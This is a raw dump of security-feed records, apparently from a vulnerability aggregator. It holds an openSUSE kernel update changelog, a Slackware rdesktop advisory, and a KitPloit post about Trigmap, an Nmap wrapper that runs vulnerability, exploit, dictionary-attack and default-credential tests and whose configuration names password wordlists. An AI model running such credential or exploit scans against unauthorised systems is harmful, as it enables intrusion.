socket: set sock->sk to NULL after calling proto_ops::release()\n (networking-stable-19_03_07).\n - net: validate untrusted gso packets without csum offload\n (networking-stable-19_02_20).\n - net/x25: fix a race in x25_bind() (networking-stable-19_03_15).\n - net/x25: fix use-after-free in x25_device_event()\n (networking-stable-19_03_15).\n - net/x25: reset state in x25_connect() (networking-stable-19_03_15).\n - net: xfrm: use preempt-safe this_cpu_read() in ipcomp_alloc_tfms()\n (git-fixes).\n - NFC: nci: Add some bounds checking in nci_hci_cmd_received()\n (bsc#1051510).\n - NFS: Add missing encode / decode sequence_maxsz to v4.2 operations\n (git-fixes).\n - nfsd4: catch some false session retries (git-fixes).\n - nfsd4: fix cached replies to solo SEQUENCE compounds (git-fixes).\n - NFS: Do not recoalesce on error in nfs_pageio_complete_mirror()\n (git-fixes).\n - NFS: Do not use page_file_mapping after removing the page (git-fixes).\n - NFS: Fix an I/O request leakage in nfs_do_recoalesce (git-fixes).\n - NFS: Fix a soft lockup in the delegation recovery code (git-fixes).\n - NFS: Fix a typo in nfs_init_timeout_values() (git-fixes).\n - NFS: Fix dentry revalidation on NFSv4 lookup (bsc#1132618).\n - NFS: Fix I/O request leakages (git-fixes).\n - NFS: fix mount/umount race in nlmclnt (git-fixes).\n - NFS/pnfs: Bulk destroy of layouts needs to be safe w.r.t. umount\n (git-fixes).\n - NFSv4.1 do not free interrupted slot on open (git-fixes).\n - NFSv4.1: Reinitialise sequence results before retransmitting a request\n (git-fixes).\n - NFSv4/flexfiles: Fix invalid deref in FF_LAYOUT_DEVID_NODE() (git-fixes).\n - nvme: add proper discard setup for the multipath device (bsc#1114638).\n - nvme: fix the dangerous reference of namespaces list (bsc#1131673).\n - nvme: make sure ns head inherits underlying device limits (bsc#1131673).\n - nvme-multipath: avoid crash on invalid subsystem cntlid enumeration\n (bsc#1129273).\n - nvme-multipath: split bios with the ns_head bio_set before submitting\n (bsc#1103259, bsc#1131673).\n - nvme: only reconfigure discard if necessary (bsc#1114638).\n - ocfs2: fix inode bh swapping mixup in ocfs2_reflink_inodes_lock\n (bsc#1131169).\n - ocfs2: turn on OCFS2_FS_STATS setting(bsc#1134393) We need to turn on\n OCFS2_FS_STATS kernel configuration setting, to fix bsc#1134393.\n - omapfb: add missing of_node_put after of_device_is_available\n (bsc#1051510).\n - openvswitch: add seqadj extension when NAT is used (bsc#1051510).\n - openvswitch: fix flow actions reallocation (bsc#1051510).\n - packet: validate msg_namelen in send directly (git-fixes).\n - PCI: Add function 1 DMA alias quirk for Marvell 9170 SATA controller\n (bsc#1051510).\n - PCI: designware-ep: Read-only registers need DBI_RO_WR_EN to be writable\n (bsc#1051510).\n - PCI: pciehp: Convert to threaded IRQ (bsc#1133005).\n - PCI: pciehp: Ignore Link State Changes after powering off a slot\n (bsc#1133005).\n - phy: sun4i-usb: Make sure to disable PHY0 passby for peripheral mode\n (bsc#1051510).\n - phy: sun4i-usb: Support set_mode to USB_HOST for non-OTG PHYs\n (bsc#1051510).\n - platform/x86: alienware-wmi: printing the wrong error code (bsc#1051510).\n - platform/x86: dell-rbtn: Add missing #include (bsc#1051510).\n - platform/x86: intel_pmc_ipc: adding error handling (bsc#1051510).\n - platform/x86: intel_punit_ipc: Revert "Fix resource ioremap warning"\n (bsc#1051510).\n - platform/x86: pmc_atom: Drop __initconst on dmi table (bsc#1051510).\n - platform/x86: sony-laptop: Fix unintentional fall-through (bsc#1051510).\n - powerpc/64: Call setup_barrier_nospec() from setup_arch() (bsc#1131107).\n - powerpc/64: Disable the speculation barrier from the command line\n (bsc#1131107).\n - powerpc64/ftrace: Include ftrace.h needed for enable/disable calls\n (bsc#1088804, git-fixes).\n - powerpc/64: Make stf barrier PPC_BOOK3S_64 specific (bsc#1131107).\n - powerpc/64s: Add new security feature flags for count cache flush\n (bsc#1131107).\n - powerpc/64s: Add support for software count cache flush (bsc#1131107).\n - powerpc/64s: Fix logic when handling unknown CPU features (bsc#1055117).\n - powerpc/64s: Fix page table fragment refcount race vs speculative\n references (bsc#1131326, bsc#1108937).\n - powerpc/asm: Add a patch_site macro & helpers for patching instructions\n (bsc#1131107).\n - powerpc: avoid -mno-sched-epilog on GCC 4.9 and newer (bsc#1065729).\n - powerpc: consolidate -mno-sched-epilog into FTRACE flags (bsc#1065729).\n - powerpc: Fix 32-bit KVM-PR lockup and host crash with MacOS guest\n (bsc#1061840).\n - powerpc/fsl: Fix spectre_v2 mitigations reporting (bsc#1131107).\n - powerpc/hugetlb: Handle mmap_min_addr correctly in get_unmapped_area\n callback (bsc#1131900).\n - powerpc/kvm: Save and restore host AMR/IAMR/UAMOR (bsc#1061840).\n - powerpc/mm: Add missing tracepoint for tlbie (bsc#1055117, git-fixes).\n - powerpc/mm: Check secondary hash page table (bsc#1065729).\n - powerpc/mm: Fix page table dump to work on Radix (bsc#1055186,\n git-fixes).\n - powerpc/mm/hash: Handle mmap_min_addr correctly in get_unmapped_area\n topdown search (bsc#1131900).\n - powerpc/mm/radix: Display if mappings are exec or not (bsc#1055186,\n git-fixes).\n - powerpc/mm/radix: Prettify mapped memory range print out (bsc#1055186,\n git-fixes).\n - powerpc/numa: document topology_updates_enabled, disable by default\n (bsc#1133584).\n - powerpc/numa: improve control of topology updates (bsc#1133584).\n - powerpc/perf: Fix unit_sel/cache_sel checks (bsc#1053043).\n - powerpc/perf: Remove l2 bus events from HW cache event array\n (bsc#1053043).\n - powerpc/powernv/cpuidle: Init all present cpus for deep states\n (bsc#1055121).\n - powerpc/powernv: Do not reprogram SLW image on every KVM guest\n entry/exit (bsc#1061840).\n - powerpc/powernv/ioda2: Remove redundant free of TCE pages (bsc#1061840).\n - powerpc/powernv/ioda: Allocate indirect TCE levels of cached userspace\n addresses on demand (bsc#1061840).\n - powerpc/powernv/ioda: Fix locked_vm counting for memory used by IOMMU\n tables (bsc#1061840).\n - powerpc/powernv: Make opal log only readable by root (bsc#1065729).\n - powerpc/powernv: Query firmware for count cache flush settings\n (bsc#1131107).\n - powerpc/powernv: Remove never used pnv_power9_force_smt4 (bsc#1061840).\n - powerpc/pseries: Query hypervisor for count cache flush settings\n (bsc#1131107).\n - powerpc/security: Fix spectre_v2 reporting (bsc#1131107).\n - powerpc/speculation: Support 'mitigations=' cmdline option (bsc#1112178).\n - powerpc/vdso32: fix CLOCK_MONOTONIC on PPC64 (bsc#1131587).\n - powerpc/vdso64: Fix CLOCK_MONOTONIC inconsistencies across Y2038\n (bsc#1131587).\n - proc/kcore: do not bounds check against address 0 (bsc#1051510).\n - proc: revalidate kernel thread inodes to root:root (bsc#1051510).\n - proc/sysctl: fix return error for proc_doulongvec_minmax() (bsc#1051510).\n - pwm: Fix deadlock warning when removing PWM device (bsc#1051510).\n - pwm: meson: Consider 128 a valid pre-divider (bsc#1051510).\n - pwm: meson: Do not disable PWM when setting duty repeatedly\n (bsc#1051510).\n - pwm: meson: Use the spin-lock only to protect register modifications\n (bsc#1051510).\n - pwm: tiehrpwm: Update shadow register for disabling PWMs (bsc#1051510).\n - qla2xxx: allow irqbalance control in non-MQ mode (bsc#1128979).\n - qla2xxx: always allocate qla_tgt_wq (bsc#1131451).\n - qmi_wwan: add Olicard 600 (bsc#1051510).\n - qmi_wwan: Add support for Quectel EG12/EM12 (networking-stable-19_03_07).\n - RAS/CEC: Check the correct variable in the debugfs error handling\n (bsc#1085535).\n - ravb: Decrease TxFIFO depth of Q3 and Q2 to one\n (networking-stable-19_03_15).\n - rdma/cxgb4: Add support for 64Byte cqes (bsc#1127371).\n - rdma/cxgb4: Add support for kernel mode SRQ's (bsc#1127371).\n - rdma/cxgb4: Add support for srq functions & structs (bsc#1127371).\n - rdma/cxgb4: fix some info leaks (bsc#1127371).\n - RDMA/cxgb4: Make c4iw_poll_cq_one() easier to analyze (bsc#1127371).\n - rdma/cxgb4: Remove a set-but-not-used variable (bsc#1127371).\n - RDMA/iw_cxgb4: Drop __GFP_NOFAIL (bsc#1127371).\n - rds: fix refcount bug in rds_sock_addref (git-fixes).\n - rds: tcp: atomically purge entries from rds_tcp_conn_list during netns\n delete (git-fixes).\n - Re-export snd_cards for kABI compatibility (bsc#1051510).\n - regulator: tps65086: Fix tps65086_ldoa1_ranges for selector 0xB\n (bsc#1051510).\n - Revert "ALSA: seq: Protect in-kernel ioctl calls with mutex"\n (bsc#1051510).\n - Revert "block: unexport DISK_EVENT_MEDIA_CHANGE for legacy/fringe\n drivers" (bsc#1110946, bsc#1119843).\n - Revert "drm/sun4i: rgb: Change the pixel clock validation check\n (bnc#1113722)"\n - Revert "ide: unexport DISK_EVENT_MEDIA_CHANGE for ide-gd and ide-cd"\n (bsc#1110946).\n - Revert "tty: pty: Fix race condition between release_one_tty and\n pty_write" (bsc#1051510).\n - ring-buffer: Check if memory is available before allocation\n (bsc#1132531).\n - route: set the deleted fnhe fnhe_daddr to 0 in ip_del_fnhe to fix a race\n (networking-stable-19_03_15).\n - rt2x00: do not increment sequence number while re-transmitting\n (bsc#1051510).\n - rtlwifi: rtl8723ae: Fix missing break in switch statement (bsc#1051510).\n - rxrpc: Do not release call mutex on error pointer (git-fixes).\n - rxrpc: Do not treat call aborts as conn aborts (git-fixes).\n - rxrpc: Fix client call queueing, waiting for channel\n (networking-stable-19_03_15).\n - rxrpc: Fix Tx ring annotation after initial Tx failure (git-fixes).\n - s390/dasd: fix panic for failed online processing (bsc#1132589).\n - s390/pkey: move pckmo subfunction available checks away from module init\n (bsc#1128544).\n - s390/speculation: Support 'mitigations=' cmdline option (bsc#1112178).\n - sc16is7xx: missing unregister/delete driver on error in sc16is7xx_init()\n (bsc#1051510).\n - sc16is7xx: move label 'err_spi' to correct section (bsc#1051510).\n - sc16is7xx: put err_spi and err_i2c into correct #ifdef (bsc#1051510).\n - scripts: override locale from environment when running recordmcount.pl\n (bsc#1134354).\n - scsi: libsas: allocate sense buffer for bsg queue (bsc#1131467).\n - scsi: qla2xxx: Add new FC-NVMe enable BIT to enable FC-NVMe feature\n (bsc#1130579).\n - scsi: qla2xxx: Fix panic in qla_dfs_tgt_counters_show (bsc#1132044).\n - sctp: call gso_reset_checksum when computing checksum in\n sctp_gso_segment (networking-stable-19_02_24).\n - sctp: only update outstanding_bytes for transmitted queue when doing\n prsctp_prune (git-fixes).\n - sctp: set frag_point in sctp_setsockopt_maxseg correctly` (git-fixes).\n - selinux: use kernel linux/socket.h for genheaders and mdp (bsc#1134810).\n - serial: 8250_pxa: honor the port number from devicetree (bsc#1051510).\n - serial: ar933x_uart: Fix build failure with disabled console\n (bsc#1051510).\n - serial: max310x: Fix to avoid potential NULL pointer dereference\n (bsc#1051510).\n - serial: sh-sci: Fix setting SCSCR_TIE while transferring data\n (bsc#1051510).\n - serial: uartps: console_setup() can't be placed to init section\n (bsc#1051510).\n - sit: check if IPv6 enabled before calling ip6_err_gen_icmpv6_unreach()\n (networking-stable-19_02_24).\n - SoC: imx-sgtl5000: add missing put_device() (bsc#1051510).\n - soc: qcom: gsbi: Fix error handling in gsbi_probe() (bsc#1051510).\n - soc/tegra: fuse: Fix illegal free of IO base address (bsc#1051510).\n - soc/tegra: pmc: Drop locking from tegra_powergate_is_powered()\n (bsc#1051510).\n - spi: a3700: Clear DATA_OUT when performing a read (bsc#1051510).\n - spi: bcm2835aux: fix driver to not allow 65535 (=-1) cs-gpios\n (bsc#1051510).\n - spi: bcm2835aux: setup gpio-cs to output and correct level during setup\n (bsc#1051510).\n - spi: bcm2835aux: warn in dmesg that native cs is not really supported\n (bsc#1051510).\n - spi: rspi: Fix sequencer reset during initialization (bsc#1051510).\n - ssb: Fix possible NULL pointer dereference in ssb_host_pcmcia_exit\n (bsc#1051510).\n - staging: comedi: ni_usb6501: Fix possible double-free of ->usb_rx_buf\n (bsc#1051510).\n - staging: comedi: ni_usb6501: Fix use of uninitialized mutex\n (bsc#1051510).\n - staging: comedi: vmk80xx: Fix possible double-free of ->usb_rx_buf\n (bsc#1051510).\n - staging: comedi: vmk80xx: Fix use of uninitialized semaphore\n (bsc#1051510).\n - staging: iio: ad7192: Fix ad7193 channel address (bsc#1051510).\n - staging: rtl8188eu: Fix potential NULL pointer dereference of kcalloc\n (bsc#1051510).\n - staging: rtl8712: uninitialized memory in read_bbreg_hdl() (bsc#1051510).\n - staging: vt6655: Fix interrupt race condition on device start up\n (bsc#1051510).\n - staging: vt6655: Remove vif check from vnt_interrupt (bsc#1051510).\n - stm class: Fix an endless loop in channel allocation (bsc#1051510).\n - stm class: Fix channel free in stm output free path (bsc#1051510).\n - stm class: Prevent division by zero (bsc#1051510).\n - sunrpc/cache: handle missing listeners better (bsc#1126221).\n - sunrpc: fix 4 more call sites that were using stack memory with a\n scatterlist (git-fixes).\n - supported.conf: Add openvswitch to kernel-default-base (bsc#1124839).\n - supported.conf: Add vxlan to kernel-default-base (bsc#1132083).\n - supported.conf: dw_mmc-bluefield is not needed in kernel-default-base\n (bsc#1131574).\n - svm/avic: Fix invalidate logical APIC id entry (bsc#1132726).\n - svm: Fix AVIC DFR and LDR handling (bsc#1132558).\n - sysctl: handle overflow for file-max (bsc#1051510).\n - tcp: fix TCP_REPAIR_QUEUE bound checking (git-fixes).\n - tcp: tcp_v4_err() should be more careful (networking-stable-19_02_20).\n - thermal/int340x_thermal: Add additional UUIDs (bsc#1051510).\n - thermal/int340x_thermal: fix mode setting (bsc#1051510).\n - tipc: fix race condition causing hung sendto\n (networking-stable-19_03_07).\n - tpm: Fix the type of the return value in calc_tpm2_event_size()\n (bsc#1082555).\n - tracing: Fix a memory leak by early error exit in trace_pid_write()\n (bsc#1133702).\n - tracing: Fix buffer_ref pipe ops (bsc#1133698).\n - tracing/hrtimer: Fix tracing bugs by taking all clock bases and modes\n into account (bsc#1132527).\n - tty: atmel_serial: fix a potential NULL pointer dereference\n (bsc#1051510).\n - tty: increase the default flip buffer limit to 2*640K (bsc#1051510).\n - tty: pty: Fix race condition between release_one_tty and pty_write\n (bsc#1051510).\n - tty: vt.c: Fix TIOCL_BLANKSCREEN console blanking if blankinterval == 0\n (bsc#1051510).\n - tun: fix blocking read (networking-stable-19_03_07).\n - tun: remove unnecessary memory barrier (networking-stable-19_03_07).\n - UAS: fix alignment of scatter/gather segments (bsc#1129770).\n - udf: Fix crash on IO error during truncate (bsc#1131175).\n - usb: cdc-acm: fix unthrottle races (bsc#1051510).\n - usb: chipidea: Grab the (legacy) USB PHY by phandle first (bsc#1051510).\n - usb: core: Fix bug caused by duplicate interface PM usage counter\n (bsc#1051510).\n - usb: core: Fix unterminated string returned by usb_string()\n (bsc#1051510).\n - usb: dwc3: Fix default lpm_nyet_threshold value (bsc#1051510).\n - usb: f_fs: Avoid crash due to out-of-scope stack ptr access\n (bsc#1051510).\n - usb: gadget: net2272: Fix net2272_dequeue() (bsc#1051510).\n - usb: gadget: net2280: Fix net2280_dequeue() (bsc#1051510).\n - usb: gadget: net2280: Fix overrun of OUT messages (bsc#1051510).\n - usb: host: xhci-rcar: Add XHCI_TRUST_TX_LENGTH quirk (bsc#1051510).\n - usb: mtu3: fix EXTCON dependency (bsc#1051510).\n - usb: serial: cp210x: add new device id (bsc#1051510).\n - usb: serial: cp210x: fix GPIO in autosuspend (bsc#1120902).\n - usb: serial: f81232: fix interrupt worker not stop (bsc#1051510).\n - usb: serial: fix unthrottle races (bsc#1051510).\n - usb: serial: ftdi_sio: add additional NovaTech products (bsc#1051510).\n - usb: serial: option: add Olicard 600 (bsc#1051510).\n - usb: serial: option: add support for Quectel EM12 (bsc#1051510).\n - usb-storage: Set virt_boundary_mask to avoid SG overflows (bsc#1051510).\n - usb: u132-hcd: fix resource leak (bsc#1051510).\n - usb: usb251xb: fix to avoid potential NULL pointer dereference\n (bsc#1051510).\n - usb: usbip: fix isoc packet num validation in get_pipe (bsc#1051510).\n - usb: w1 ds2490: Fix bug caused by improper use of altsetting array\n (bsc#1051510).\n - usb: yurex: Fix protection fault after device removal (bsc#1051510).\n - vfio/mdev: Avoid release parent reference during error path\n (bsc#1051510).\n - vfio/mdev: Fix aborting mdev child device removal if one fails\n (bsc#1051510).\n - vfio_pci: Enable memory accesses before calling pci_map_rom\n (bsc#1051510).\n - vfio/pci: use correct format characters (bsc#1051510).\n - vfs: allow dedupe of user owned read-only files (bsc#1133778,\n bsc#1132219).\n - vfs: avoid problematic remapping requests into partial EOF block\n (bsc#1133850, bsc#1132219).\n - vfs: dedupe: extract helper for a single dedup (bsc#1133769,\n bsc#1132219).\n - vfs: dedupe should return EPERM if permission is not granted\n (bsc#1133779, bsc#1132219).\n - vfs: exit early from zero length remap operations (bsc#1132411,\n bsc#1132219).\n - vfs: export vfs_dedupe_file_range_one() to modules (bsc#1133772,\n bsc#1132219).\n - vfs: limit size of dedupe (bsc#1132397, bsc#1132219).\n - vfs: rename clone_verify_area to remap_verify_area (bsc#1133852,\n bsc#1132219).\n - vfs: skip zero-length dedupe requests (bsc#1133851, bsc#1132219).\n - vfs: swap names of {do,vfs}_clone_file_range() (bsc#1133774,\n bsc#1132219).\n - vfs: vfs_clone_file_prep_inodes should return EINVAL for a clone from\n beyond EOF (bsc#1133780, bsc#1132219).\n - vhost/vsock: fix reset orphans race with close timeout (bsc#1051510).\n - video: fbdev: Set pixclock = 0 in goldfishfb (bsc#1051510).\n - virtio-blk: limit number of hw queues by nr_cpu_ids (bsc#1051510).\n - virtio: Honour 'may_reduce_num' in vring_create_virtqueue (bsc#1051510).\n - virtio_pci: fix a NULL pointer reference in vp_del_vqs (bsc#1051510).\n - vsock/virtio: fix kernel panic after device hot-unplug (bsc#1051510).\n - vsock/virtio: fix kernel panic from virtio_transport_reset_no_sock\n (bsc#1051510).\n - vsock/virtio: reset connected sockets on device removal (bsc#1051510).\n - vxlan: test dev->flags & IFF_UP before calling netif_rx()\n (networking-stable-19_02_20).\n - wil6210: check null pointer in _wil_cfg80211_merge_extra_ies\n (bsc#1051510).\n - wlcore: Fix memory leak in case wl12xx_fetch_firmware failure\n (bsc#1051510).\n - x86/cpu: Sanitize FAM6_ATOM naming (bsc#1111331).\n - x86/kvm: Expose X86_FEATURE_MD_CLEAR to guests (bsc#1111331).\n - x86/kvm/hyper-v: avoid spurious pending stimer on vCPU init\n (bsc#1132572).\n - x86/kvm/vmx: Add MDS protection when L1D Flush is not active\n (bsc#1111331).\n - x86/MCE/AMD, EDAC/mce_amd: Add new error descriptions for some SMCA bank\n types (bsc#1128415).\n - x86/MCE/AMD, EDAC/mce_amd: Add new McaTypes for CS, PSP, and SMU units\n (bsc#1128415).\n - x86/MCE/AMD, EDAC/mce_amd: Add new MP5, NBIO, and PCIE SMCA bank types\n (bsc#1128415).\n - x86/mce/AMD, EDAC/mce_amd: Enumerate Reserved SMCA bank type\n (bsc#1128415).\n - x86/mce/AMD: Pass the bank number to smca_get_bank_type() (bsc#1128415).\n - x86/MCE: Fix kABI for new AMD bank names (bsc#1128415).\n - x86/mce: Handle varying MCA bank counts (bsc#1128415).\n - x86/msr-index: Cleanup bit defines (bsc#1111331).\n - x86/PCI: Fixup RTIT_BAR of Intel Denverton Trace Hub (bsc#1120318).\n - x86/speculation: Consolidate CPU whitelists (bsc#1111331).\n - x86/speculation/mds: Add basic bug infrastructure for MDS (bsc#1111331).\n - x86/speculation/mds: Add BUG_MSBDS_ONLY (bsc#1111331).\n - x86/speculation/mds: Add mds_clear_cpu_buffers() (bsc#1111331).\n - x86/speculation/mds: Add mds=full,nosmt cmdline option (bsc#1111331).\n - x86/speculation/mds: Add mitigation control for MDS (bsc#1111331).\n - x86/speculation/mds: Add mitigation mode VMWERV (bsc#1111331).\n - x86/speculation/mds: Add 'mitigations=' support for MDS (bsc#1111331).\n - x86/speculation/mds: Add SMT warning message (bsc#1111331).\n - x86/speculation/mds: Add sysfs reporting for MDS (bsc#1111331).\n - x86/speculation/mds: Clear CPU buffers on exit to user (bsc#1111331).\n - x86/speculation/mds: Conditionally clear CPU buffers on idle entry\n (bsc#1111331).\n - x86/speculation/mds: Print SMT vulnerable on MSBDS with mitigations off\n (bsc#1111331).\n - x86/speculation: Move arch_smt_update() call to after mitigation\n decisions (bsc#1111331).\n - x86/speculation: Prevent deadlock on ssb_state::lock (bsc#1114279).\n - x86/speculation: Simplify the CPU bug detection logic (bsc#1111331).\n - x86/speculation: Support 'mitigations=' cmdline option (bsc#1112178).\n - x86/tsc: Force inlining of cyc2ns bits (bsc#1052904).\n - xen-netback: do not populate the hash cache on XenBus disconnect\n (networking-stable-19_03_07).\n - xen-netback: fix occasional leak of grant ref mappings under memory\n pressure (networking-stable-19_03_07).\n - xen: Prevent buffer overflow in privcmd ioctl (bsc#1065600).\n - xfrm: do not call rcu_read_unlock when afinfo is NULL in xfrm_get_tos\n (git-fixes).\n - xfrm: Fix ESN sequence number handling for IPsec GSO packets (git-fixes).\n - xfrm: fix rcu_read_unlock usage in xfrm_local_error (git-fixes).\n - xfrm: Fix stack-out-of-bounds read on socket policy lookup (git-fixes).\n - xfrm: fix xfrm_do_migrate() with AEAD e.g(AES-GCM) (git-fixes).\n - xfrm: Return error on unknown encap_type in init_state (git-fixes).\n - xfs: add the ability to join a held buffer to a defer_ops (bsc#1133674).\n - xfs: allow xfs_lock_two_inodes to take different EXCL/SHARED modes\n (bsc#1132370, bsc#1132219).\n - xfs: call xfs_qm_dqattach before performing reflink operations\n (bsc#1132368, bsc#1132219).\n - xfs: cap the length of deduplication requests (bsc#1132373, bsc#1132219).\n - xfs: clean up xfs_reflink_remap_blocks call site (bsc#1132413,\n bsc#1132219).\n - xfs: detect and fix bad summary counts at mount (bsc#1114427).\n - xfs: fix data corruption w/ unaligned dedupe ranges (bsc#1132405,\n bsc#1132219).\n - xfs: fix data corruption w/ unaligned reflink ranges (bsc#1132407,\n bsc#1132219).\n - xfs: fix pagecache truncation prior to reflink (bsc#1132412,\n bsc#1132219).\n - xfs: fix reporting supported extra file attributes for statx()\n (bsc#1133529).\n - xfs: flush removing page cache in xfs_reflink_remap_prep (bsc#1132414,\n bsc#1132219).\n - xfs: hold xfs_buf locked between shortform->leaf conversion and the\n addition of an attribute (bsc#1133675).\n - xfs: kill meaningless variable 'zero' (bsc#1106011).\n - xfs: only grab shared inode locks for source file during reflink\n (bsc#1132372, bsc#1132219).\n - xfs: prepare xfs_break_layouts() for another layout type (bsc#1106011).\n - xfs: prepare xfs_break_layouts() to be called with XFS_MMAPLOCK_EXCL\n (bsc#1106011).\n - xfs: refactor clonerange preparation into a separate helper\n (bsc#1132402, bsc#1132219).\n - xfs: refactor xfs_trans_roll (bsc#1133667).\n - xfs: reflink find shared should take a transaction (bsc#1132226,\n bsc#1132219).\n - xfs: reflink should break pnfs leases before sharing blocks\n (bsc#1132369, bsc#1132219).\n - xfs: remove dest file's post-eof preallocations before reflinking\n (bsc#1132365, bsc#1132219).\n - xfs: remove the ip argument to xfs_defer_finish (bsc#1133672).\n - xfs: remove xfs_zero_range (bsc#1106011).\n - xfs: rename xfs_defer_join to xfs_defer_ijoin (bsc#1133668).\n - xfs: update ctime and remove suid before cloning files (bsc#1132404,\n bsc#1132219).\n - xfs: zero posteof blocks when cloning above eof (bsc#1132403,\n bsc#1132219).\n - xhci: Do not let USB3 ports stuck in polling state prevent suspend\n (bsc#1051510).\n - xhci: Fix port resume done detection for SS ports with LPM enabled\n (bsc#1051510).\n\n", "modified": "2019-05-16T15:09:29", "published": "2019-05-16T15:09:29", "id": "OPENSUSE-SU-2019:1404-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00037.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2019-05-16T18:47:03", "bulletinFamily": "unix", "description": "New rdesktop packages are available for Slackware 14.0, 14.1, 14.2,\nand -current to fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/rdesktop-1.8.5-i586-1_slack14.2.txz: Upgraded.\n This update fixes security issues:\n Add bounds checking to protocol handling in order to fix many\n security problems when communicating with a malicious server.\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/rdesktop-1.8.5-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/rdesktop-1.8.5-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/rdesktop-1.8.5-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/rdesktop-1.8.5-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/rdesktop-1.8.5-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/rdesktop-1.8.5-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/rdesktop-1.8.5-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/rdesktop-1.8.5-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\nba367efcf0f70167a8791d2211f8ca43 rdesktop-1.8.5-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n1495fd99d763c36ac434badb5e8586bf rdesktop-1.8.5-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nc38052237f138380e385e4562006472f rdesktop-1.8.5-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nb996ac69fd4379f1a08483e728adb276 rdesktop-1.8.5-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\nba6af1c6c0c2adc89cfb94d39db1f976 rdesktop-1.8.5-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n0715f48dc29c6ed4bf36900bd82425a3 rdesktop-1.8.5-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n3185621a3ff1e79f204878060811094b xap/rdesktop-1.8.5-i586-1.txz\n\nSlackware x86_64 -current package:\nb0e156f52fff64bc890e898e6de1c5e0 xap/rdesktop-1.8.5-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg rdesktop-1.8.5-i586-1_slack14.2.txz", "modified": "2019-05-15T21:56:33", "published": "2019-05-15T21:56:33", "id": "SSA-2019-135-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2019&m=slackware-security.423617", "title": "rdesktop", "type": "slackware", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2019-05-15T17:29:35", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-kREe3j8AE7E/XNY0Li9hY-I/AAAAAAAAO3k/L3wCG_K9r9c1SdjMiSEQI1UuoDtEYAxSQCLcBGAs/s1600/trigmap_6_trigmap_logo.png>)\n\n \nTrigmap is a wrapper for Nmap. You can use it to easily start Nmap scan and especially to collect informations into a well organized directory hierarchy. The use of Nmap makes the script ** portable ** (easy to run not only on Kali Linux) and very ** efficient ** thanks to the optimized Nmap algorithms. \n \n** Details ** \nTrigmap can performs several tasks using Nmap scripting engine (NSE): \n\n\n * ** _ Port Scan _ **\n * ** _ Service and Version Detection _ **\n * ** _ Web Resources Enumeration _ **\n * ** _ Vulnerability Assessment _ **\n * ** _ Common Vulnerabilities Test _ **\n * ** _ Common Exploits Test _ **\n * ** _ Dictionary Attacks Against Active Services _ **\n * ** _ Default [ Credentials ](<https://www.kitploit.com/search/label/Credentials> \"Credentials\" ) Test _ **\n \n** Usage ** \nTrigmap can be used in two ways: \n\n\n * Interactive mode: \n` trigmap [ENTER], and the script does the rest ` \n\n\n \n\n\n[  ](<https://3.bp.blogspot.com/-jV1luUcZEvI/XNY0R9uQGXI/AAAAAAAAO3o/ko16BhTBgiA0oY8TpztfwLbX5LPyJ75EgCLcBGAs/s1600/trigmap_7_interactive_mode.png>)\n\n * NON-interactive mode: \n` trigmap -h|--host <target/s> [-tp|--tcp TCP ports] [-up|--udp UDP ports] [-f|--file file path] [-s|--speed time profile] [-n|--nic NIC] [-p|--phase phases] ` \n \n** If you want to see the help: ** \n` trigmap --help to print this helper ` \n \n_ ** For more screenshots see the relative [ directory ](<https://github.com/Leviathan36/trigmap/tree/master/trigmap_images/screenshots> \"directory\" ) of the repository. ** _ \n \n** Dir Hierarchy ** \n\n\n \n\n\n[  ](<https://2.bp.blogspot.com/-O0JSDuiXd8U/XNY0WFIfFJI/AAAAAAAAO3s/YaMV0AihnBgDl9IMhvG4GYkBlTE0IipVQCLcBGAs/s1600/trigmap_8_dir_hierarchy.png>)\n\n** Customization ** \nIt's possible to customize the script by changing the value of variables at the beginning of the file. In particularly you can choose the [ wordlists ](<https://www.kitploit.com/search/label/Wordlists> \"wordlists\" ) used by the Nmap scripts and the most important Nmap scan parameters (ping, scan, timing and script). \n\n \n \n ##############################################\n ### PARAMETERS ###\n ##############################################\n GENERAL_USER_LIST='general_user_wordlist_short.txt'\n WIN_USER_LIST='win_user_wordlist_short.txt'\n UNIX_USER_LIST='unix_user_wordlist_short.txt'\n SHORT_PASS_LIST='fasttrack.txt'\n LONG_PASS_LIST='rockyou.txt'\n \n 